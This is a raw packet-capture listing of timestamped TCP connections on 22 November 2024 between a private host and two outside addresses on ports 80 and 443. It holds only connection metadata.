Nov 22, 2024 20:36:11.108078957 CET	49790	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.108094931 CET	443	49790	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.109595060 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.109711885 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.109723091 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.109762907 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.111340046 CET	49797	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.111394882 CET	443	49797	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.111449957 CET	49797	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.111593008 CET	49797	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.111609936 CET	443	49797	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.114586115 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.114639997 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.114682913 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.114722967 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.119584084 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.119641066 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.119788885 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.119829893 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.124531984 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.124588013 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.124619007 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.124654055 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.129394054 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.129450083 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.129563093 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.129599094 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.134371996 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.134428978 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.134505033 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.134547949 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.139293909 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.139338970 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.139410019 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.139468908 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.144293070 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.144351959 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.144361019 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.144398928 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.148520947 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.148586035 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.148639917 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.148749113 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.148767948 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.148778915 CET	49793	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.148783922 CET	443	49793	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.149137974 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.149188995 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.149276972 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.149317026 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.151448965 CET	49798	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.151499033 CET	443	49798	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.151585102 CET	49798	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.151689053 CET	49798	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.151706934 CET	443	49798	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.154155016 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.154208899 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.154226065 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.154267073 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.159086943 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.159141064 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.159181118 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.159221888 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.164001942 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.164051056 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.164129019 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.164170980 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.168950081 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.169018984 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.169158936 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.169204950 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.173886061 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.173949003 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.173990965 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.174034119 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.178777933 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.178838968 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.178909063 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.178950071 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.183744907 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.183809042 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.183896065 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.183938980 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.188893080 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.188960075 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.189035892 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.189085960 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.193612099 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.193664074 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.193682909 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.193725109 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.193732023 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.193782091 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.193928003 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.193939924 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.193965912 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.193989038 CET	49792	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.194004059 CET	443	49792	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.196803093 CET	49799	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.196825981 CET	443	49799	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.196893930 CET	49799	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.198662043 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.198725939 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.198749065 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.198798895 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.200738907 CET	49799	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.200752974 CET	443	49799	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.203605890 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.203651905 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.312865973 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.312942028 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.313019037 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.314094067 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.314496994 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.314548969 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.315223932 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.315270901 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.315351963 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.315393925 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.319417000 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.319478035 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.319502115 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.319521904 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.322906017 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.322983027 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.323007107 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.323055983 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.326689959 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.326740980 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.326796055 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.326833963 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.330285072 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.330359936 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.330405951 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.330444098 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.333906889 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.333957911 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.334003925 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.334042072 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.337574005 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.337626934 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.337673903 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.337718010 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.341164112 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.341207981 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.341298103 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.341332912 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.345016956 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.345072985 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.345264912 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.345305920 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.348419905 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.348468065 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.348714113 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.348757982 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.352098942 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.352152109 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.352163076 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.352200985 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.355699062 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.355763912 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.355798006 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.355839968 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.359298944 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.359373093 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.359390020 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.359431982 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.362955093 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.363064051 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.363094091 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.363136053 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.366533041 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.366585970 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.366641998 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.366686106 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.370141029 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.370194912 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.370285034 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.370332003 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.373759985 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.373862028 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.373879910 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.373924017 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.377382994 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.377430916 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.377500057 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.377541065 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.381016970 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.381056070 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.381084919 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.381125927 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.384680033 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.384732962 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.384763956 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.384805918 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.388298035 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.388348103 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.388432980 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.388597012 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.391885996 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.391952991 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.392004013 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.392045975 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.395503044 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.395550013 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.395606995 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.395654917 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.399120092 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.399179935 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.399245977 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.399291039 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.402781010 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.402827978 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.402911901 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.402955055 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.406521082 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.406574011 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.406640053 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.406682968 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.409970045 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.410018921 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.410089970 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.410279989 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.413572073 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.413625956 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.413690090 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.413732052 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.417228937 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.417284012 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.417371035 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.417419910 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.420870066 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.420924902 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.420985937 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.421025991 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.424520016 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.424576998 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.424628019 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.424673080 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.428107023 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.428215027 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.428265095 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.428308964 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.431780100 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.431842089 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.431883097 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.431931019 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.435352087 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.435409069 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.435465097 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.435502052 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.438962936 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.439058065 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.439095974 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.439138889 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.442589998 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.442647934 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.442692041 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.442729950 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.446218014 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.446275949 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.446281910 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.446325064 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.461246967 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.461348057 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.461399078 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.461549044 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.461566925 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.461591005 CET	49795	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.461596966 CET	443	49795	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.464711905 CET	49800	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.464809895 CET	443	49800	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.464911938 CET	49800	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.465080976 CET	49800	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:11.465120077 CET	443	49800	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:11.523386002 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.523471117 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.523509026 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.523550034 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.524631023 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.524681091 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.524734020 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.524780989 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.527329922 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.527380943 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.528318882 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.528374910 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.528426886 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.528490067 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.530988932 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.531054974 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.531110048 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.531152964 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.533606052 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.533662081 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.533682108 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.533721924 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.536232948 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.536279917 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.536339045 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.536508083 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.538794041 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.538841963 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.538846970 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.538886070 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.541364908 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.541464090 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.541487932 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.541606903 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.543937922 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.543988943 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.544141054 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.544188023 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.546382904 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.546430111 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.546654940 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.546698093 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.548891068 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.548947096 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.549030066 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.549078941 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.551282883 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.551333904 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.551441908 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.551489115 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.553694010 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.553750038 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.553801060 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.553845882 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.556039095 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.556097031 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.556157112 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.556200981 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.558413982 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.558461905 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.558465004 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.558509111 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.560703039 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.560751915 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.560817957 CET	80	49794	31.41.244.11	192.168.2.4
